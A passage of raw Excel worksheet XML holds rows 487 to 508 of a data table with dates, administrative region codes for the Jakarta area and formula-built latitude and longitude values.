        <v>2179</v>
      </c>
      <c r="H487" t="s">
        <v>26</v>
      </c>
      <c r="I487" t="s">
        <v>1633</v>
      </c>
      <c r="J487" t="s">
        <v>2180</v>
      </c>
      <c r="L487" t="s">
        <v>2181</v>
      </c>
      <c r="M487">
        <v>3172080005</v>
      </c>
      <c r="N487">
        <v>3172080</v>
      </c>
      <c r="O487">
        <v>3172</v>
      </c>
      <c r="P487">
        <v>31</v>
      </c>
      <c r="Q487" t="s">
        <v>140</v>
      </c>
      <c r="R487" t="s">
        <v>141</v>
      </c>
      <c r="S487" t="s">
        <v>49</v>
      </c>
      <c r="T487" t="s">
        <v>33</v>
      </c>
      <c r="U487" s="5">
        <v>10696801</v>
      </c>
      <c r="V487" s="5" t="s">
        <v>14903</v>
      </c>
      <c r="W487" s="5">
        <v>-616252</v>
      </c>
      <c r="X487" t="s">
        <v>18715</v>
      </c>
      <c r="Y487" t="str">
        <f t="shared" si="7"/>
        <v>-6.16252,106.96801</v>
      </c>
    </row>
    <row r="488" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A488">
        <v>102210</v>
      </c>
      <c r="B488" s="1">
        <v>43868</v>
      </c>
      <c r="C488">
        <v>1</v>
      </c>
      <c r="D488" t="s">
        <v>22</v>
      </c>
      <c r="E488" t="s">
        <v>23</v>
      </c>
      <c r="F488" t="s">
        <v>2182</v>
      </c>
      <c r="G488" t="s">
        <v>2183</v>
      </c>
      <c r="H488" t="s">
        <v>26</v>
      </c>
      <c r="I488" t="s">
        <v>2139</v>
      </c>
      <c r="J488" t="s">
        <v>37</v>
      </c>
      <c r="L488" t="s">
        <v>2184</v>
      </c>
      <c r="M488">
        <v>3275040006</v>
      </c>
      <c r="N488">
        <v>3275040</v>
      </c>
      <c r="O488">
        <v>3275</v>
      </c>
      <c r="P488">
        <v>32</v>
      </c>
      <c r="Q488" t="s">
        <v>2185</v>
      </c>
      <c r="R488" t="s">
        <v>100</v>
      </c>
      <c r="S488" t="s">
        <v>41</v>
      </c>
      <c r="T488" t="s">
        <v>42</v>
      </c>
      <c r="U488" s="5">
        <v>10701143</v>
      </c>
      <c r="V488" s="5" t="s">
        <v>14904</v>
      </c>
      <c r="W488" s="5">
        <v>-623988</v>
      </c>
      <c r="X488" t="s">
        <v>18716</v>
      </c>
      <c r="Y488" t="str">
        <f t="shared" si="7"/>
        <v>-6.23988,107.01143</v>
      </c>
    </row>
    <row r="489" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A489">
        <v>102211</v>
      </c>
      <c r="B489" s="1">
        <v>43868</v>
      </c>
      <c r="C489">
        <v>1</v>
      </c>
      <c r="D489" t="s">
        <v>22</v>
      </c>
      <c r="E489" t="s">
        <v>23</v>
      </c>
      <c r="F489" t="s">
        <v>2186</v>
      </c>
      <c r="G489" t="s">
        <v>2187</v>
      </c>
      <c r="H489" t="s">
        <v>26</v>
      </c>
      <c r="I489" t="s">
        <v>2188</v>
      </c>
      <c r="J489" t="s">
        <v>2189</v>
      </c>
      <c r="L489" t="s">
        <v>2190</v>
      </c>
      <c r="M489">
        <v>3174020001</v>
      </c>
      <c r="N489">
        <v>3174020</v>
      </c>
      <c r="O489">
        <v>3174</v>
      </c>
      <c r="P489">
        <v>31</v>
      </c>
      <c r="Q489" t="s">
        <v>2191</v>
      </c>
      <c r="R489" t="s">
        <v>31</v>
      </c>
      <c r="S489" t="s">
        <v>32</v>
      </c>
      <c r="T489" t="s">
        <v>33</v>
      </c>
      <c r="U489" s="5">
        <v>10677482</v>
      </c>
      <c r="V489" s="5" t="s">
        <v>14905</v>
      </c>
      <c r="W489" s="5">
        <v>-622144</v>
      </c>
      <c r="X489" t="s">
        <v>18717</v>
      </c>
      <c r="Y489" t="str">
        <f t="shared" si="7"/>
        <v>-6.22144,106.77482</v>
      </c>
    </row>
    <row r="490" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A490">
        <v>102212</v>
      </c>
      <c r="B490" s="1">
        <v>43868</v>
      </c>
      <c r="C490">
        <v>1</v>
      </c>
      <c r="D490" t="s">
        <v>22</v>
      </c>
      <c r="E490" t="s">
        <v>23</v>
      </c>
      <c r="F490" t="s">
        <v>2192</v>
      </c>
      <c r="G490" t="s">
        <v>2193</v>
      </c>
      <c r="H490" t="s">
        <v>26</v>
      </c>
      <c r="I490" t="s">
        <v>1099</v>
      </c>
      <c r="J490" t="s">
        <v>2194</v>
      </c>
      <c r="M490">
        <v>3175050002</v>
      </c>
      <c r="N490">
        <v>3175050</v>
      </c>
      <c r="O490">
        <v>3175</v>
      </c>
      <c r="P490">
        <v>31</v>
      </c>
      <c r="Q490" t="s">
        <v>1012</v>
      </c>
      <c r="R490" t="s">
        <v>1013</v>
      </c>
      <c r="S490" t="s">
        <v>547</v>
      </c>
      <c r="T490" t="s">
        <v>33</v>
      </c>
      <c r="U490" s="5">
        <v>10690453</v>
      </c>
      <c r="V490" s="5" t="s">
        <v>14906</v>
      </c>
      <c r="W490" s="5">
        <v>-617280</v>
      </c>
      <c r="X490" t="s">
        <v>18718</v>
      </c>
      <c r="Y490" t="str">
        <f t="shared" si="7"/>
        <v>-6.17280,106.90453</v>
      </c>
    </row>
    <row r="491" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A491">
        <v>102213</v>
      </c>
      <c r="B491" s="1">
        <v>43868</v>
      </c>
      <c r="C491">
        <v>1</v>
      </c>
      <c r="D491" t="s">
        <v>22</v>
      </c>
      <c r="E491" t="s">
        <v>23</v>
      </c>
      <c r="F491" t="s">
        <v>2195</v>
      </c>
      <c r="H491" t="s">
        <v>26</v>
      </c>
      <c r="I491" t="s">
        <v>2196</v>
      </c>
      <c r="J491" t="s">
        <v>2197</v>
      </c>
      <c r="L491" t="s">
        <v>2198</v>
      </c>
      <c r="M491">
        <v>3175030002</v>
      </c>
      <c r="N491">
        <v>3175030</v>
      </c>
      <c r="O491">
        <v>3175</v>
      </c>
      <c r="P491">
        <v>31</v>
      </c>
      <c r="Q491" t="s">
        <v>1592</v>
      </c>
      <c r="R491" t="s">
        <v>1563</v>
      </c>
      <c r="S491" t="s">
        <v>547</v>
      </c>
      <c r="T491" t="s">
        <v>33</v>
      </c>
      <c r="U491" s="5">
        <v>10687858</v>
      </c>
      <c r="V491" s="5" t="s">
        <v>14907</v>
      </c>
      <c r="W491" s="5">
        <v>-615136</v>
      </c>
      <c r="X491" t="s">
        <v>18719</v>
      </c>
      <c r="Y491" t="str">
        <f t="shared" si="7"/>
        <v>-6.15136,106.87858</v>
      </c>
    </row>
    <row r="492" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A492">
        <v>102214</v>
      </c>
      <c r="B492" s="1">
        <v>43868</v>
      </c>
      <c r="C492">
        <v>1</v>
      </c>
      <c r="D492" t="s">
        <v>22</v>
      </c>
      <c r="E492" t="s">
        <v>23</v>
      </c>
      <c r="F492" t="s">
        <v>2199</v>
      </c>
      <c r="G492" t="s">
        <v>2200</v>
      </c>
      <c r="H492" t="s">
        <v>26</v>
      </c>
      <c r="I492" t="s">
        <v>1359</v>
      </c>
      <c r="J492" t="s">
        <v>2021</v>
      </c>
      <c r="M492">
        <v>3175030001</v>
      </c>
      <c r="N492">
        <v>3175030</v>
      </c>
      <c r="O492">
        <v>3175</v>
      </c>
      <c r="P492">
        <v>31</v>
      </c>
      <c r="Q492" t="s">
        <v>1574</v>
      </c>
      <c r="R492" t="s">
        <v>1563</v>
      </c>
      <c r="S492" t="s">
        <v>547</v>
      </c>
      <c r="T492" t="s">
        <v>33</v>
      </c>
      <c r="U492" s="5">
        <v>10686440</v>
      </c>
      <c r="V492" s="5" t="s">
        <v>14908</v>
      </c>
      <c r="W492" s="5">
        <v>-613571</v>
      </c>
      <c r="X492" t="s">
        <v>18677</v>
      </c>
      <c r="Y492" t="str">
        <f t="shared" si="7"/>
        <v>-6.13571,106.86440</v>
      </c>
    </row>
    <row r="493" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A493">
        <v>102215</v>
      </c>
      <c r="B493" s="1">
        <v>43868</v>
      </c>
      <c r="C493">
        <v>1</v>
      </c>
      <c r="D493" t="s">
        <v>22</v>
      </c>
      <c r="E493" t="s">
        <v>23</v>
      </c>
      <c r="F493" t="s">
        <v>2201</v>
      </c>
      <c r="G493" t="s">
        <v>2202</v>
      </c>
      <c r="H493" t="s">
        <v>26</v>
      </c>
      <c r="I493" t="s">
        <v>1633</v>
      </c>
      <c r="J493" t="s">
        <v>37</v>
      </c>
      <c r="L493" t="s">
        <v>2203</v>
      </c>
      <c r="M493">
        <v>3275040007</v>
      </c>
      <c r="N493">
        <v>3275040</v>
      </c>
      <c r="O493">
        <v>3275</v>
      </c>
      <c r="P493">
        <v>32</v>
      </c>
      <c r="Q493" t="s">
        <v>99</v>
      </c>
      <c r="R493" t="s">
        <v>100</v>
      </c>
      <c r="S493" t="s">
        <v>41</v>
      </c>
      <c r="T493" t="s">
        <v>42</v>
      </c>
      <c r="U493" s="5">
        <v>10701805</v>
      </c>
      <c r="V493" s="5" t="s">
        <v>14909</v>
      </c>
      <c r="W493" s="5">
        <v>-623416</v>
      </c>
      <c r="X493" t="s">
        <v>18720</v>
      </c>
      <c r="Y493" t="str">
        <f t="shared" si="7"/>
        <v>-6.23416,107.01805</v>
      </c>
    </row>
    <row r="494" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A494">
        <v>102216</v>
      </c>
      <c r="B494" s="1">
        <v>43868</v>
      </c>
      <c r="C494">
        <v>1</v>
      </c>
      <c r="D494" t="s">
        <v>22</v>
      </c>
      <c r="E494" t="s">
        <v>23</v>
      </c>
      <c r="F494" t="s">
        <v>2204</v>
      </c>
      <c r="G494" t="s">
        <v>2205</v>
      </c>
      <c r="H494" t="s">
        <v>26</v>
      </c>
      <c r="I494" t="s">
        <v>1194</v>
      </c>
      <c r="J494" t="s">
        <v>1995</v>
      </c>
      <c r="L494" t="s">
        <v>2206</v>
      </c>
      <c r="M494">
        <v>3175030001</v>
      </c>
      <c r="N494">
        <v>3175030</v>
      </c>
      <c r="O494">
        <v>3175</v>
      </c>
      <c r="P494">
        <v>31</v>
      </c>
      <c r="Q494" t="s">
        <v>1574</v>
      </c>
      <c r="R494" t="s">
        <v>1563</v>
      </c>
      <c r="S494" t="s">
        <v>547</v>
      </c>
      <c r="T494" t="s">
        <v>33</v>
      </c>
      <c r="U494" s="5">
        <v>10687128</v>
      </c>
      <c r="V494" s="5" t="s">
        <v>14910</v>
      </c>
      <c r="W494" s="5">
        <v>-614110</v>
      </c>
      <c r="X494" t="s">
        <v>18672</v>
      </c>
      <c r="Y494" t="str">
        <f t="shared" si="7"/>
        <v>-6.14110,106.87128</v>
      </c>
    </row>
    <row r="495" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A495">
        <v>102217</v>
      </c>
      <c r="B495" s="1">
        <v>43868</v>
      </c>
      <c r="C495">
        <v>1</v>
      </c>
      <c r="D495" t="s">
        <v>22</v>
      </c>
      <c r="E495" t="s">
        <v>23</v>
      </c>
      <c r="F495" t="s">
        <v>2207</v>
      </c>
      <c r="G495" t="s">
        <v>2208</v>
      </c>
      <c r="H495" t="s">
        <v>26</v>
      </c>
      <c r="I495" t="s">
        <v>1263</v>
      </c>
      <c r="J495" t="s">
        <v>2209</v>
      </c>
      <c r="L495" t="s">
        <v>2210</v>
      </c>
      <c r="M495">
        <v>3171060001</v>
      </c>
      <c r="N495">
        <v>3171060</v>
      </c>
      <c r="O495">
        <v>3171</v>
      </c>
      <c r="P495">
        <v>31</v>
      </c>
      <c r="Q495" t="s">
        <v>2211</v>
      </c>
      <c r="R495" t="s">
        <v>1236</v>
      </c>
      <c r="S495" t="s">
        <v>108</v>
      </c>
      <c r="T495" t="s">
        <v>33</v>
      </c>
      <c r="U495" s="5">
        <v>10679384</v>
      </c>
      <c r="V495" s="5" t="s">
        <v>14911</v>
      </c>
      <c r="W495" s="5">
        <v>-626131</v>
      </c>
      <c r="X495" t="s">
        <v>18287</v>
      </c>
      <c r="Y495" t="str">
        <f t="shared" si="7"/>
        <v>-6.26131,106.79384</v>
      </c>
    </row>
    <row r="496" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A496">
        <v>102218</v>
      </c>
      <c r="B496" s="1">
        <v>43868</v>
      </c>
      <c r="C496">
        <v>1</v>
      </c>
      <c r="D496" t="s">
        <v>22</v>
      </c>
      <c r="E496" t="s">
        <v>23</v>
      </c>
      <c r="F496" t="s">
        <v>2212</v>
      </c>
      <c r="G496" t="s">
        <v>2213</v>
      </c>
      <c r="H496" t="s">
        <v>26</v>
      </c>
      <c r="I496" t="s">
        <v>1559</v>
      </c>
      <c r="J496" t="s">
        <v>2214</v>
      </c>
      <c r="L496" t="s">
        <v>2215</v>
      </c>
      <c r="M496">
        <v>3173060002</v>
      </c>
      <c r="N496">
        <v>3173060</v>
      </c>
      <c r="O496">
        <v>3173</v>
      </c>
      <c r="P496">
        <v>31</v>
      </c>
      <c r="Q496" t="s">
        <v>60</v>
      </c>
      <c r="R496" t="s">
        <v>61</v>
      </c>
      <c r="S496" t="s">
        <v>62</v>
      </c>
      <c r="T496" t="s">
        <v>33</v>
      </c>
      <c r="U496" s="5">
        <v>10686228</v>
      </c>
      <c r="V496" s="5" t="s">
        <v>14912</v>
      </c>
      <c r="W496" s="5">
        <v>-616451</v>
      </c>
      <c r="X496" t="s">
        <v>18721</v>
      </c>
      <c r="Y496" t="str">
        <f t="shared" si="7"/>
        <v>-6.16451,106.86228</v>
      </c>
    </row>
    <row r="497" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A497">
        <v>102219</v>
      </c>
      <c r="B497" s="1">
        <v>43868</v>
      </c>
      <c r="C497">
        <v>1</v>
      </c>
      <c r="D497" t="s">
        <v>22</v>
      </c>
      <c r="E497" t="s">
        <v>23</v>
      </c>
      <c r="F497" t="s">
        <v>2216</v>
      </c>
      <c r="G497" t="s">
        <v>2217</v>
      </c>
      <c r="H497" t="s">
        <v>26</v>
      </c>
      <c r="I497" t="s">
        <v>628</v>
      </c>
      <c r="J497" t="s">
        <v>343</v>
      </c>
      <c r="L497" t="s">
        <v>2218</v>
      </c>
      <c r="M497">
        <v>3171090007</v>
      </c>
      <c r="N497">
        <v>3171090</v>
      </c>
      <c r="O497">
        <v>3171</v>
      </c>
      <c r="P497">
        <v>31</v>
      </c>
      <c r="Q497" t="s">
        <v>346</v>
      </c>
      <c r="R497" t="s">
        <v>347</v>
      </c>
      <c r="S497" t="s">
        <v>108</v>
      </c>
      <c r="T497" t="s">
        <v>33</v>
      </c>
      <c r="U497" s="5">
        <v>10685706</v>
      </c>
      <c r="V497" s="5" t="s">
        <v>14913</v>
      </c>
      <c r="W497" s="5">
        <v>-621360</v>
      </c>
      <c r="X497" t="s">
        <v>18722</v>
      </c>
      <c r="Y497" t="str">
        <f t="shared" si="7"/>
        <v>-6.21360,106.85706</v>
      </c>
    </row>
    <row r="498" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A498">
        <v>102220</v>
      </c>
      <c r="B498" s="1">
        <v>43868</v>
      </c>
      <c r="C498">
        <v>1</v>
      </c>
      <c r="D498" t="s">
        <v>22</v>
      </c>
      <c r="E498" t="s">
        <v>23</v>
      </c>
      <c r="F498" t="s">
        <v>2219</v>
      </c>
      <c r="G498" t="s">
        <v>2220</v>
      </c>
      <c r="H498" t="s">
        <v>26</v>
      </c>
      <c r="I498" t="s">
        <v>193</v>
      </c>
      <c r="J498" t="s">
        <v>2221</v>
      </c>
      <c r="L498" t="s">
        <v>2222</v>
      </c>
      <c r="M498">
        <v>3172050007</v>
      </c>
      <c r="N498">
        <v>3172050</v>
      </c>
      <c r="O498">
        <v>3172</v>
      </c>
      <c r="P498">
        <v>31</v>
      </c>
      <c r="Q498" t="s">
        <v>1673</v>
      </c>
      <c r="R498" t="s">
        <v>358</v>
      </c>
      <c r="S498" t="s">
        <v>49</v>
      </c>
      <c r="T498" t="s">
        <v>33</v>
      </c>
      <c r="U498" s="5">
        <v>10686387</v>
      </c>
      <c r="V498" s="5" t="s">
        <v>14914</v>
      </c>
      <c r="W498" s="5">
        <v>-624611</v>
      </c>
      <c r="X498" t="s">
        <v>18723</v>
      </c>
      <c r="Y498" t="str">
        <f t="shared" si="7"/>
        <v>-6.24611,106.86387</v>
      </c>
    </row>
    <row r="499" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A499">
        <v>102221</v>
      </c>
      <c r="B499" s="1">
        <v>43868</v>
      </c>
      <c r="C499">
        <v>1</v>
      </c>
      <c r="D499" t="s">
        <v>22</v>
      </c>
      <c r="E499" t="s">
        <v>23</v>
      </c>
      <c r="F499" t="s">
        <v>2223</v>
      </c>
      <c r="G499" t="s">
        <v>2224</v>
      </c>
      <c r="H499" t="s">
        <v>26</v>
      </c>
      <c r="I499" t="s">
        <v>1624</v>
      </c>
      <c r="J499" t="s">
        <v>2225</v>
      </c>
      <c r="L499" t="s">
        <v>2226</v>
      </c>
      <c r="M499">
        <v>3175020001</v>
      </c>
      <c r="N499">
        <v>3175020</v>
      </c>
      <c r="O499">
        <v>3175</v>
      </c>
      <c r="P499">
        <v>31</v>
      </c>
      <c r="Q499" t="s">
        <v>2227</v>
      </c>
      <c r="R499" t="s">
        <v>2228</v>
      </c>
      <c r="S499" t="s">
        <v>547</v>
      </c>
      <c r="T499" t="s">
        <v>33</v>
      </c>
      <c r="U499" s="5">
        <v>10683541</v>
      </c>
      <c r="V499" s="5" t="s">
        <v>14915</v>
      </c>
      <c r="W499" s="5">
        <v>-613814</v>
      </c>
      <c r="X499" t="s">
        <v>18724</v>
      </c>
      <c r="Y499" t="str">
        <f t="shared" si="7"/>
        <v>-6.13814,106.83541</v>
      </c>
    </row>
    <row r="500" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A500">
        <v>102222</v>
      </c>
      <c r="B500" s="1">
        <v>43868</v>
      </c>
      <c r="C500">
        <v>1</v>
      </c>
      <c r="D500" t="s">
        <v>22</v>
      </c>
      <c r="E500" t="s">
        <v>23</v>
      </c>
      <c r="F500" t="s">
        <v>2229</v>
      </c>
      <c r="H500" t="s">
        <v>26</v>
      </c>
      <c r="I500" t="s">
        <v>1538</v>
      </c>
      <c r="J500" t="s">
        <v>2230</v>
      </c>
      <c r="L500" t="s">
        <v>2231</v>
      </c>
      <c r="M500">
        <v>3175030002</v>
      </c>
      <c r="N500">
        <v>3175030</v>
      </c>
      <c r="O500">
        <v>3175</v>
      </c>
      <c r="P500">
        <v>31</v>
      </c>
      <c r="Q500" t="s">
        <v>1592</v>
      </c>
      <c r="R500" t="s">
        <v>1563</v>
      </c>
      <c r="S500" t="s">
        <v>547</v>
      </c>
      <c r="T500" t="s">
        <v>33</v>
      </c>
      <c r="U500" s="5">
        <v>10687717</v>
      </c>
      <c r="V500" s="5" t="s">
        <v>14916</v>
      </c>
      <c r="W500" s="5">
        <v>-615686</v>
      </c>
      <c r="X500" t="s">
        <v>18725</v>
      </c>
      <c r="Y500" t="str">
        <f t="shared" si="7"/>
        <v>-6.15686,106.87717</v>
      </c>
    </row>
    <row r="501" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A501">
        <v>102223</v>
      </c>
      <c r="B501" s="1">
        <v>43868</v>
      </c>
      <c r="C501">
        <v>1</v>
      </c>
      <c r="D501" t="s">
        <v>22</v>
      </c>
      <c r="E501" t="s">
        <v>23</v>
      </c>
      <c r="F501" t="s">
        <v>2232</v>
      </c>
      <c r="H501" t="s">
        <v>26</v>
      </c>
      <c r="I501" t="s">
        <v>380</v>
      </c>
      <c r="J501" t="s">
        <v>1656</v>
      </c>
      <c r="L501" t="s">
        <v>2233</v>
      </c>
      <c r="M501">
        <v>3173080003</v>
      </c>
      <c r="N501">
        <v>3173080</v>
      </c>
      <c r="O501">
        <v>3173</v>
      </c>
      <c r="P501">
        <v>31</v>
      </c>
      <c r="Q501" t="s">
        <v>157</v>
      </c>
      <c r="R501" t="s">
        <v>157</v>
      </c>
      <c r="S501" t="s">
        <v>62</v>
      </c>
      <c r="T501" t="s">
        <v>33</v>
      </c>
      <c r="U501" s="5">
        <v>10682655</v>
      </c>
      <c r="V501" s="5" t="s">
        <v>14917</v>
      </c>
      <c r="W501" s="5">
        <v>-618075</v>
      </c>
      <c r="X501" t="s">
        <v>18726</v>
      </c>
      <c r="Y501" t="str">
        <f t="shared" si="7"/>
        <v>-6.18075,106.82655</v>
      </c>
    </row>
    <row r="502" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A502">
        <v>102224</v>
      </c>
      <c r="B502" s="1">
        <v>43868</v>
      </c>
      <c r="C502">
        <v>1</v>
      </c>
      <c r="D502" t="s">
        <v>22</v>
      </c>
      <c r="E502" t="s">
        <v>23</v>
      </c>
      <c r="F502" t="s">
        <v>2234</v>
      </c>
      <c r="G502" t="s">
        <v>2235</v>
      </c>
      <c r="H502" t="s">
        <v>26</v>
      </c>
      <c r="I502" t="s">
        <v>1194</v>
      </c>
      <c r="J502" t="s">
        <v>37</v>
      </c>
      <c r="M502">
        <v>3275010008</v>
      </c>
      <c r="N502">
        <v>3275010</v>
      </c>
      <c r="O502">
        <v>3275</v>
      </c>
      <c r="P502">
        <v>32</v>
      </c>
      <c r="Q502" t="s">
        <v>2236</v>
      </c>
      <c r="R502" t="s">
        <v>287</v>
      </c>
      <c r="S502" t="s">
        <v>41</v>
      </c>
      <c r="T502" t="s">
        <v>42</v>
      </c>
      <c r="U502" s="5">
        <v>10692522</v>
      </c>
      <c r="V502" s="5" t="s">
        <v>14918</v>
      </c>
      <c r="W502" s="5">
        <v>-627385</v>
      </c>
      <c r="X502" t="s">
        <v>18727</v>
      </c>
      <c r="Y502" t="str">
        <f t="shared" si="7"/>
        <v>-6.27385,106.92522</v>
      </c>
    </row>
    <row r="503" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A503">
        <v>102225</v>
      </c>
      <c r="B503" s="1">
        <v>43868</v>
      </c>
      <c r="C503">
        <v>1</v>
      </c>
      <c r="D503" t="s">
        <v>22</v>
      </c>
      <c r="E503" t="s">
        <v>23</v>
      </c>
      <c r="F503" t="s">
        <v>2237</v>
      </c>
      <c r="G503" t="s">
        <v>2238</v>
      </c>
      <c r="H503" t="s">
        <v>26</v>
      </c>
      <c r="I503" t="s">
        <v>974</v>
      </c>
      <c r="J503" t="s">
        <v>2239</v>
      </c>
      <c r="M503">
        <v>3173060008</v>
      </c>
      <c r="N503">
        <v>3173060</v>
      </c>
      <c r="O503">
        <v>3173</v>
      </c>
      <c r="P503">
        <v>31</v>
      </c>
      <c r="Q503" t="s">
        <v>329</v>
      </c>
      <c r="R503" t="s">
        <v>61</v>
      </c>
      <c r="S503" t="s">
        <v>62</v>
      </c>
      <c r="T503" t="s">
        <v>33</v>
      </c>
      <c r="U503" s="5">
        <v>10684805</v>
      </c>
      <c r="V503" s="5" t="s">
        <v>14919</v>
      </c>
      <c r="W503" s="5">
        <v>-615803</v>
      </c>
      <c r="X503" t="s">
        <v>18728</v>
      </c>
      <c r="Y503" t="str">
        <f t="shared" si="7"/>
        <v>-6.15803,106.84805</v>
      </c>
    </row>
    <row r="504" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A504">
        <v>102226</v>
      </c>
      <c r="B504" s="1">
        <v>43868</v>
      </c>
      <c r="C504">
        <v>1</v>
      </c>
      <c r="D504" t="s">
        <v>22</v>
      </c>
      <c r="E504" t="s">
        <v>23</v>
      </c>
      <c r="F504" t="s">
        <v>2240</v>
      </c>
      <c r="H504" t="s">
        <v>26</v>
      </c>
      <c r="I504" t="s">
        <v>2139</v>
      </c>
      <c r="J504" t="s">
        <v>1560</v>
      </c>
      <c r="L504" t="s">
        <v>2241</v>
      </c>
      <c r="M504">
        <v>3175030007</v>
      </c>
      <c r="N504">
        <v>3175030</v>
      </c>
      <c r="O504">
        <v>3175</v>
      </c>
      <c r="P504">
        <v>31</v>
      </c>
      <c r="Q504" t="s">
        <v>1562</v>
      </c>
      <c r="R504" t="s">
        <v>1563</v>
      </c>
      <c r="S504" t="s">
        <v>547</v>
      </c>
      <c r="T504" t="s">
        <v>33</v>
      </c>
      <c r="U504" s="5">
        <v>10687634</v>
      </c>
      <c r="V504" s="5" t="s">
        <v>14920</v>
      </c>
      <c r="W504" s="5">
        <v>-611512</v>
      </c>
      <c r="X504" t="s">
        <v>18729</v>
      </c>
      <c r="Y504" t="str">
        <f t="shared" si="7"/>
        <v>-6.11512,106.87634</v>
      </c>
    </row>
    <row r="505" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A505">
        <v>102227</v>
      </c>
      <c r="B505" s="1">
        <v>43868</v>
      </c>
      <c r="C505">
        <v>1</v>
      </c>
      <c r="D505" t="s">
        <v>22</v>
      </c>
      <c r="E505" t="s">
        <v>23</v>
      </c>
      <c r="F505" t="s">
        <v>2242</v>
      </c>
      <c r="G505" t="s">
        <v>2243</v>
      </c>
      <c r="H505" t="s">
        <v>26</v>
      </c>
      <c r="I505" t="s">
        <v>511</v>
      </c>
      <c r="J505" t="s">
        <v>37</v>
      </c>
      <c r="L505" t="s">
        <v>2244</v>
      </c>
      <c r="M505">
        <v>3275050002</v>
      </c>
      <c r="N505">
        <v>3275050</v>
      </c>
      <c r="O505">
        <v>3275</v>
      </c>
      <c r="P505">
        <v>32</v>
      </c>
      <c r="Q505" t="s">
        <v>2245</v>
      </c>
      <c r="R505" t="s">
        <v>955</v>
      </c>
      <c r="S505" t="s">
        <v>41</v>
      </c>
      <c r="T505" t="s">
        <v>42</v>
      </c>
      <c r="U505" s="5">
        <v>10697641</v>
      </c>
      <c r="V505" s="5" t="s">
        <v>14921</v>
      </c>
      <c r="W505" s="5">
        <v>-627378</v>
      </c>
      <c r="X505" t="s">
        <v>18730</v>
      </c>
      <c r="Y505" t="str">
        <f t="shared" si="7"/>
        <v>-6.27378,106.97641</v>
      </c>
    </row>
    <row r="506" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A506">
        <v>102228</v>
      </c>
      <c r="B506" s="1">
        <v>43868</v>
      </c>
      <c r="C506">
        <v>1</v>
      </c>
      <c r="D506" t="s">
        <v>22</v>
      </c>
      <c r="E506" t="s">
        <v>23</v>
      </c>
      <c r="F506" t="s">
        <v>2246</v>
      </c>
      <c r="G506" t="s">
        <v>2247</v>
      </c>
      <c r="H506" t="s">
        <v>26</v>
      </c>
      <c r="I506" t="s">
        <v>1559</v>
      </c>
      <c r="J506" t="s">
        <v>2248</v>
      </c>
      <c r="L506" t="s">
        <v>2249</v>
      </c>
      <c r="M506">
        <v>3172080003</v>
      </c>
      <c r="N506">
        <v>3172080</v>
      </c>
      <c r="O506">
        <v>3172</v>
      </c>
      <c r="P506">
        <v>31</v>
      </c>
      <c r="Q506" t="s">
        <v>2250</v>
      </c>
      <c r="R506" t="s">
        <v>141</v>
      </c>
      <c r="S506" t="s">
        <v>49</v>
      </c>
      <c r="T506" t="s">
        <v>33</v>
      </c>
      <c r="U506" s="5">
        <v>10695356</v>
      </c>
      <c r="V506" s="5" t="s">
        <v>14922</v>
      </c>
      <c r="W506" s="5">
        <v>-620243</v>
      </c>
      <c r="X506" t="s">
        <v>18731</v>
      </c>
      <c r="Y506" t="str">
        <f t="shared" si="7"/>
        <v>-6.20243,106.95356</v>
      </c>
    </row>
    <row r="507" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A507">
        <v>102229</v>
      </c>
      <c r="B507" s="1">
        <v>43868</v>
      </c>
      <c r="C507">
        <v>1</v>
      </c>
      <c r="D507" t="s">
        <v>22</v>
      </c>
      <c r="E507" t="s">
        <v>23</v>
      </c>
      <c r="F507" t="s">
        <v>2251</v>
      </c>
      <c r="G507" t="s">
        <v>2252</v>
      </c>
      <c r="H507" t="s">
        <v>26</v>
      </c>
      <c r="I507" t="s">
        <v>555</v>
      </c>
      <c r="J507" t="s">
        <v>1035</v>
      </c>
      <c r="L507" t="s">
        <v>2253</v>
      </c>
      <c r="M507">
        <v>3175050001</v>
      </c>
      <c r="N507">
        <v>3175050</v>
      </c>
      <c r="O507">
        <v>3175</v>
      </c>
      <c r="P507">
        <v>31</v>
      </c>
      <c r="Q507" t="s">
        <v>1037</v>
      </c>
      <c r="R507" t="s">
        <v>1013</v>
      </c>
      <c r="S507" t="s">
        <v>547</v>
      </c>
      <c r="T507" t="s">
        <v>33</v>
      </c>
      <c r="U507" s="5">
        <v>10689308</v>
      </c>
      <c r="V507" s="5" t="s">
        <v>14923</v>
      </c>
      <c r="W507" s="5">
        <v>-616068</v>
      </c>
      <c r="X507" t="s">
        <v>18732</v>
      </c>
      <c r="Y507" t="str">
        <f t="shared" si="7"/>
        <v>-6.16068,106.89308</v>
      </c>
    </row>
    <row r="508" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A508">
        <v>102230</v>
      </c>
      <c r="B508" s="1">
        <v>43868</v>
      </c>
      <c r="C508">
        <v>1</v>
      </c>
      <c r="D508" t="s">
        <v>22</v>
      </c>
      <c r="E508" t="s">
        <v>23</v>
      </c>
      <c r="F508" t="s">
        <v>2254</v>
      </c>
      <c r="G508" t="s">
        <v>2255</v>
      </c>
      <c r="H508" t="s">
        <v>26</v>
      </c>
      <c r="I508" t="s">
        <v>2256</v>
      </c>
      <c r="J508" t="s">
        <v>2257</v>
      </c>
      <c r="L508" t="s">
        <v>2258</v>
      </c>
      <c r="M508">
        <v>3172090004</v>
      </c>
      <c r="N508">
        <v>3172090</v>
      </c>
      <c r="O508">
        <v>3172</v>
      </c>
      <c r="P508">
        <v>31</v>
      </c>
      <c r="Q508" t="s">
        <v>889</v>
      </c>
      <c r="R508" t="s">
        <v>890</v>
      </c>
      <c r="S508" t="s">
        <v>49</v>
      </c>
      <c r="T508" t="s">
        <v>33</v>
      </c>
